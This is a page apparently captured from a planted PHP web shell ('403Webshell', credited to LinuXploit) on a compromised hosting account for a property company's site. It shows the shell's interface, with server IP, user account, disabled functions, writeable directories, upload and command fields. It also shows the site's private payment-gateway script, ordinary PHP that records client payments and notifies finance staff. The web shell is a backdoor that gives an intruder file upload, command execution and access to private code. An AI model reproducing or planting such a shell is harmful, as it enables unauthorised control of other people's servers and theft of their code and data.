403Webshell
Server IP : 72.60.21.38  /  Your IP : 216.73.216.164
Web Server : LiteSpeed
System : Linux uk-fast-web1372.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : u390967363 ( 390967363)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u390967363/domains/aibenproperties.com/public_html/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u390967363/domains/aibenproperties.com/public_html/app/gateway-initiate.php
<?php
if (session_status() === PHP_SESSION_NONE) { session_start(); }
require_once __DIR__ . '/includes/db.php';
require_once __DIR__ . '/includes/functions.php';
require_once __DIR__ . '/includes/mailer.php';

header('Content-Type: application/json');

if (!isset($_SESSION['user_id']) || ($_SESSION['user_role'] ?? '') !== 'client') {
    echo json_encode(['ok' => false, 'error' => 'unauthorized']);
    exit;
}

$uid = (int)$_SESSION['user_id'];
$companyId = function_exists('getCurrentCompanyId') ? (int)getCurrentCompanyId() : 0;
$allocId = (int)($_POST['allocation_id'] ?? 0);
$propertyId = (int)($_POST['property_id'] ?? 0);
$amount = (float)($_POST['amount'] ?? 0);
$paymentType = strtolower(trim((string)($_POST['payment_type'] ?? '')));
$clientChargeId = (int)($_POST['client_charge_id'] ?? 0);
$provider = strtolower(trim($_POST['provider'] ?? ''));
$pubKey = getSetting('gateway_public_key','');

try {
    if (($allocId <= 0 && $propertyId <= 0) || $amount <= 0 || $provider === '') {
        echo json_encode(['ok'=>false, 'error'=>'invalid_params']);
        exit;
    }
    $allocIdFinal = 0;
    $propertyIdFinal = 0;
    $propertyTitle = '';

    if ($allocId > 0) {
        $q = "SELECT a.id, a.property_id, p.title AS property_title FROM allocations a LEFT JOIN properties p ON a.property_id = p.id WHERE a.id = ? AND a.user_id = ?";
        $p = [$allocId, $uid];
        if ($companyId && function_exists('tableHasColumn') && tableHasColumn('allocations','company_id')) { $q .= " AND a.company_id = ?"; $p[] = $companyId; }
        $q .= " LIMIT 1";
        $st = $pdo->prepare($q); $st->execute($p);
        $row = $st->fetch(PDO::FETCH_ASSOC) ?: [];
        if (empty($row)) {
            echo json_encode(['ok'=>false, 'error'=>'invalid_allocation']);
            exit;
        }
        $allocIdFinal = (int)($row['id'] ?? 0);
        $propertyIdFinal = (int)($row['property_id'] ?? 0);
        $propertyTitle = trim((string)($row['property_title'] ?? ''));
    } else {
        $q = "SELECT id, title FROM properties WHERE id = ?";
        $p = [$propertyId];
        if ($companyId && function_exists('tableHasColumn') && tableHasColumn('properties','company_id')) { $q .= " AND (company_id = ? OR company_id IS NULL)"; $p[] = $companyId; }
        $q .= " LIMIT 1";
        $st = $pdo->prepare($q); $st->execute($p);
        $row = $st->fetch(PDO::FETCH_ASSOC) ?: [];
        if (empty($row)) {
            echo json_encode(['ok'=>false, 'error'=>'invalid_property']);
            exit;
        }
        $propertyIdFinal = (int)($row['id'] ?? 0);
        $propertyTitle = trim((string)($row['title'] ?? ''));
        try {
            if ($propertyIdFinal > 0 && function_exists('tableHasColumn') && tableHasColumn('allocations','property_id')) {
                $qa = "SELECT id FROM allocations WHERE user_id = ? AND property_id = ?";
                $pa = [$uid, $propertyIdFinal];
                if ($companyId && tableHasColumn('allocations','company_id')) { $qa .= " AND company_id = ?"; $pa[] = $companyId; }
                $qa .= " ORDER BY id DESC LIMIT 1";
                $as = $pdo->prepare($qa); $as->execute($pa);
                $allocIdFinal = (int)($as->fetchColumn() ?: 0);
            }
        } catch (Throwable $e) { $allocIdFinal = 0; }
    }
    $ref = strtoupper(substr($provider,0,3)) . '-' . date('YmdHis') . '-' . mt_rand(1000,9999);
    $cols = ['user_id','amount','status'];
    $vals = [$uid, $amount, 'pending_gateway'];
    if ($allocIdFinal > 0 && function_exists('tableHasColumn') && tableHasColumn('payments','allocation_id')) { $cols[]='allocation_id'; $vals[] = $allocIdFinal; }
    if ($propertyIdFinal > 0 && function_exists('tableHasColumn') && tableHasColumn('payments','property_id')) { $cols[]='property_id'; $vals[] = $propertyIdFinal; }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','method')) { $cols[]='method'; $vals[] = 'Gateway-' . ucfirst($provider); }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','reference')) { $cols[]='reference'; $vals[] = $ref; }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','payment_type') && $paymentType !== '') { $cols[]='payment_type'; $vals[] = $paymentType; }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','client_charge_id') && $clientChargeId > 0) { $cols[]='client_charge_id'; $vals[] = $clientChargeId; }
    $nowTs = date('Y-m-d H:i:s');
    if (function_exists('tableHasColumn') && tableHasColumn('payments','created_at')) { $cols[]='created_at'; $vals[] = $nowTs; }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','date')) { $cols[]='date'; $vals[] = date('Y-m-d', strtotime($nowTs)); }
    if (function_exists('tableHasColumn') && tableHasColumn('payments','company_id') && $companyId) { $cols[] = 'company_id'; $vals[] = $companyId; }
    $sql = "INSERT INTO payments (" . implode(',', $cols) . ") VALUES (" . implode(',', array_fill(0, count($cols), '?')) . ")";
    $ins = $pdo->prepare($sql); $ins->execute($vals);
    try {
        $clientName = '';
        $uq = $pdo->prepare("SELECT name FROM users WHERE id = ? LIMIT 1");
        $uq->execute([$uid]);
        $clientName = (string)($uq->fetchColumn() ?: 'Client');
        $roles = ['finance','finance_officer','finance_manager'];
        $placeholders = implode(",", array_fill(0, count($roles), '?'));
        $rq = "SELECT id FROM users WHERE role IN ($placeholders)";
        $rparams = $roles;
        if ($companyId && function_exists('tableHasColumn') && tableHasColumn('users','company_id')) { $rq .= " AND company_id = ?"; $rparams[] = $companyId; }
        $rs = $pdo->prepare($rq); $rs->execute($rparams);
        $recips = $rs->fetchAll(PDO::FETCH_COLUMN);
        $subject = $propertyTitle !== '' ? $propertyTitle : ($propertyIdFinal > 0 ? ('Property #'.$propertyIdFinal) : ($allocIdFinal > 0 ? ('Allocation #'.$allocIdFinal) : 'Property'));
        foreach ($recips as $rid) {
            sendNotification((int)$rid, 'gateway_payment_initiated', $clientName . " initiated online payment for " . $subject . " NGN " . number_format($amount,2) . " Ref " . $ref, $pdo);
        }
        sendNotification($uid, 'payment_initiated', "You initiated an online payment for " . $subject . ". Reference: " . $ref, $pdo);
    } catch (Exception $e) {}
    $email = '';
    try {
        $qe = $pdo->prepare("SELECT email FROM users WHERE id = ? LIMIT 1");
        $qe->execute([$uid]);
        $email = (string)($qe->fetchColumn() ?: '');
    } catch (Exception $e) {}
    echo json_encode(['ok'=>true, 'reference'=>$ref, 'public_key'=>$pubKey, 'email'=>$email]);
    exit;
} catch (Exception $e) {
    echo json_encode(['ok'=>false, 'error'=>'server_error']);
    exit;
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit